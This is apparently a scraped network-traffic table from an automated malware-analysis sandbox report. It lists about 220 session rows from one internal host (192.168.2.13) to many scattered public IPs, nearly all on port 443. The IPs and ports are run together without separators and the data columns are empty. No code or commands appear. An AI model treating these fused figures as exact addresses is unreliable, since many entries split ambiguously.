                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17507192.168.2.1350514113.131.176.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17508192.168.2.1333530111.107.188.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17509192.168.2.1351386177.88.252.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17510192.168.2.134897259.35.136.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17511192.168.2.133724893.54.223.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17512192.168.2.1339720174.72.113.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17513192.168.2.1344512145.82.89.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17514192.168.2.133752297.0.168.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17515192.168.2.1349170118.154.10.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17516192.168.2.1347570165.29.92.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17517192.168.2.134539666.12.141.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17518192.168.2.133458839.181.14.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17519192.168.2.1345354179.47.33.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17520192.168.2.1342006129.200.229.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17521192.168.2.133628268.104.38.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17522192.168.2.1357352141.34.184.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17523192.168.2.13367341.50.227.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17524192.168.2.1352922115.25.174.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17525192.168.2.1354604172.175.115.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17526192.168.2.1357498203.189.13.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17527192.168.2.1344858113.202.134.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17528192.168.2.1344694114.224.249.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17529192.168.2.1336210167.184.24.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17530192.168.2.1342502184.249.169.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17531192.168.2.1341486213.23.136.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17532192.168.2.134887051.167.149.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17533192.168.2.1334610139.228.55.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17534192.168.2.135144470.206.205.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17535192.168.2.1356812157.65.127.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17536192.168.2.135340892.77.123.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17537192.168.2.133938620.219.203.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17538192.168.2.13415648.76.170.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17539192.168.2.134574425.4.111.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17540192.168.2.1341558222.164.88.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17541192.168.2.135412436.171.211.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17542192.168.2.1357170143.96.231.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17543192.168.2.134370461.128.168.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17544192.168.2.133468252.215.185.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17545192.168.2.1347826178.204.117.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17546192.168.2.1335078178.193.220.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17547192.168.2.1356240103.9.168.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17548192.168.2.1339458113.21.45.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17549192.168.2.1336646223.39.24.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17550192.168.2.1343398213.94.225.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17551192.168.2.1339212116.224.44.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17552192.168.2.13379001.70.34.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17553192.168.2.1356958122.185.37.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17554192.168.2.1344140133.88.210.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17555192.168.2.1341618135.216.162.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17556192.168.2.134452876.91.160.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17557192.168.2.135084472.46.86.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17558192.168.2.1350994110.178.217.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17559192.168.2.1359064107.124.226.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17560192.168.2.1344298156.167.94.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17561192.168.2.134410874.7.73.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17562192.168.2.135327683.184.34.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17563192.168.2.1343774198.132.229.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17564192.168.2.133756444.224.7.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17565192.168.2.1348920197.163.20.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17566192.168.2.1351678159.84.224.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17567192.168.2.1342462196.70.245.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17568192.168.2.1351220131.235.66.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17569192.168.2.133627814.70.167.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17570192.168.2.135850499.167.135.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17571192.168.2.1335964130.217.144.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17572192.168.2.135954017.252.241.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17573192.168.2.133432249.165.148.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17574192.168.2.134870658.156.68.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17575192.168.2.1346594149.164.198.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17576192.168.2.1343490129.40.193.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17577192.168.2.133371259.180.99.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17578192.168.2.1358472193.156.248.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17579192.168.2.1353324200.184.109.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17580192.168.2.13351148.86.112.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17581192.168.2.133485665.101.181.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17582192.168.2.134670257.116.15.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17583192.168.2.135174040.171.175.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17584192.168.2.135260262.43.250.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17585192.168.2.134365063.252.195.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17586192.168.2.1336344168.227.9.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17587192.168.2.1343216151.91.95.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17588192.168.2.134261423.0.31.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17589192.168.2.1348464190.42.230.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17590192.168.2.136008046.127.66.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17591192.168.2.135919089.102.153.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17592192.168.2.1356256211.124.198.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17593192.168.2.1350742166.230.125.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17594192.168.2.1351660197.242.129.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17595192.168.2.135468879.22.64.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17596192.168.2.1352768101.237.213.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17597192.168.2.134952027.225.47.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17598192.168.2.133500839.156.112.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17599192.168.2.1353238212.168.137.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17600192.168.2.135687638.25.243.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17601192.168.2.135030627.55.236.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17602192.168.2.1339830158.28.241.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17603192.168.2.1347124204.20.210.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17604192.168.2.135765838.193.171.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17605192.168.2.1339108116.217.119.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17606192.168.2.1338122171.177.254.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17607192.168.2.1342266100.9.134.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17608192.168.2.1347526130.244.230.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17609192.168.2.1338016143.94.165.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17610192.168.2.1355792133.252.69.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17611192.168.2.1348286129.60.141.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17612192.168.2.133305673.223.162.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17613192.168.2.1333914166.199.150.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17614192.168.2.1357048117.72.18.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17615192.168.2.133820278.3.147.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17616192.168.2.135519667.158.27.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17617192.168.2.135103874.100.111.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17618192.168.2.134111097.85.55.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17619192.168.2.135357438.66.77.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17620192.168.2.1355012179.175.55.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17621192.168.2.1338098222.110.209.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17622192.168.2.1351390108.109.62.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17623192.168.2.1347014180.223.3.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17624192.168.2.1350302159.224.199.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17625192.168.2.1360488142.125.98.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17626192.168.2.136007649.166.236.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17627192.168.2.134148694.62.205.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17628192.168.2.1352856172.68.156.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17629192.168.2.133509246.161.128.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17630192.168.2.135137265.48.95.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17631192.168.2.1357776122.78.18.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17632192.168.2.133517696.13.25.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17633192.168.2.1355556221.51.211.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17634192.168.2.1340198108.121.190.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17635192.168.2.133741275.148.41.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17636192.168.2.135842653.2.61.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17637192.168.2.1358496163.229.15.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17638192.168.2.135789078.184.27.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17639192.168.2.135166242.103.207.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17640192.168.2.1337500101.124.199.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17641192.168.2.1355016114.59.130.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17642192.168.2.1340816101.86.173.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17643192.168.2.1333012212.245.165.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17644192.168.2.1358226217.76.120.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17645192.168.2.1340034125.27.216.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17646192.168.2.1353922112.198.154.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17647192.168.2.1360134146.230.118.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17648192.168.2.1347276108.87.183.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17649192.168.2.1357076108.237.61.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17650192.168.2.1336182151.247.226.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17651192.168.2.134743275.90.13.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17652192.168.2.1355244156.106.179.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17653192.168.2.1349662213.29.121.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17654192.168.2.1360302156.254.63.778080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17655192.168.2.1338338165.3.35.108080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17656192.168.2.134994673.109.180.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17657192.168.2.1338924120.54.99.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17658192.168.2.1355864223.127.175.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17659192.168.2.135431674.63.145.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17660192.168.2.1347476117.215.208.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17661192.168.2.1344134161.61.215.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17662192.168.2.1350934150.59.207.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17663192.168.2.1342534106.175.34.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17664192.168.2.1355122187.137.115.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17665192.168.2.134055231.223.216.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17666192.168.2.135877834.19.245.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17667192.168.2.135748432.48.103.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17668192.168.2.133462069.31.237.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17669192.168.2.134721286.130.125.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17670192.168.2.135366484.17.144.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17671192.168.2.1352014206.42.26.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17672192.168.2.134785042.52.229.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17673192.168.2.135673871.136.34.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17674192.168.2.1335476138.140.55.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17675192.168.2.135055219.72.245.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17676192.168.2.1360278223.29.159.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17677192.168.2.134726443.87.123.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17678192.168.2.134264249.215.25.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17679192.168.2.1358072207.157.4.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17680192.168.2.1346520168.78.186.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17681192.168.2.1349216218.154.161.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17682192.168.2.134462051.210.119.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17683192.168.2.1356580188.58.83.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17684192.168.2.135840217.80.221.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17685192.168.2.135371295.155.213.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17686192.168.2.13466221.25.55.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17687192.168.2.1343096138.232.212.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17688192.168.2.134011246.14.21.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17689192.168.2.1340700195.243.20.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17690192.168.2.13556921.34.22.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17691192.168.2.134354032.176.250.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17692192.168.2.1358922161.73.212.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17693192.168.2.135128066.148.166.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17694192.168.2.1359576173.199.98.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17695192.168.2.1350874162.107.50.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17696192.168.2.1340052128.140.128.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17697192.168.2.1347878153.66.169.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17698192.168.2.1341520203.211.238.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17699192.168.2.1356610216.120.158.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17700192.168.2.1360888157.131.78.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17701192.168.2.1353646124.216.1.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17702192.168.2.1333472213.155.159.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17703192.168.2.1333224104.58.91.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17704192.168.2.1332830102.7.181.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17705192.168.2.1354740126.65.120.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17706192.168.2.1341230123.157.160.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17707192.168.2.134805082.169.180.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17708192.168.2.134921425.141.223.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17709192.168.2.1342398173.32.135.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17710192.168.2.1336100223.208.186.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17711192.168.2.1350680149.254.137.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17712192.168.2.13486268.192.155.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17713192.168.2.1349258110.11.75.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17714192.168.2.1349790144.99.22.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17715192.168.2.1340900140.204.194.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17716192.168.2.1341268131.62.213.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17717192.168.2.1357652179.103.57.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17718192.168.2.1342960207.121.178.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17719192.168.2.1339466131.131.84.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17720192.168.2.133755089.237.255.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17721192.168.2.135882267.90.141.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17722192.168.2.1334168178.42.222.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17723192.168.2.1352706182.134.15.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17724192.168.2.134696053.22.221.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17725192.168.2.134305237.206.254.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17726192.168.2.135844838.183.218.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17727192.168.2.134812634.170.52.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
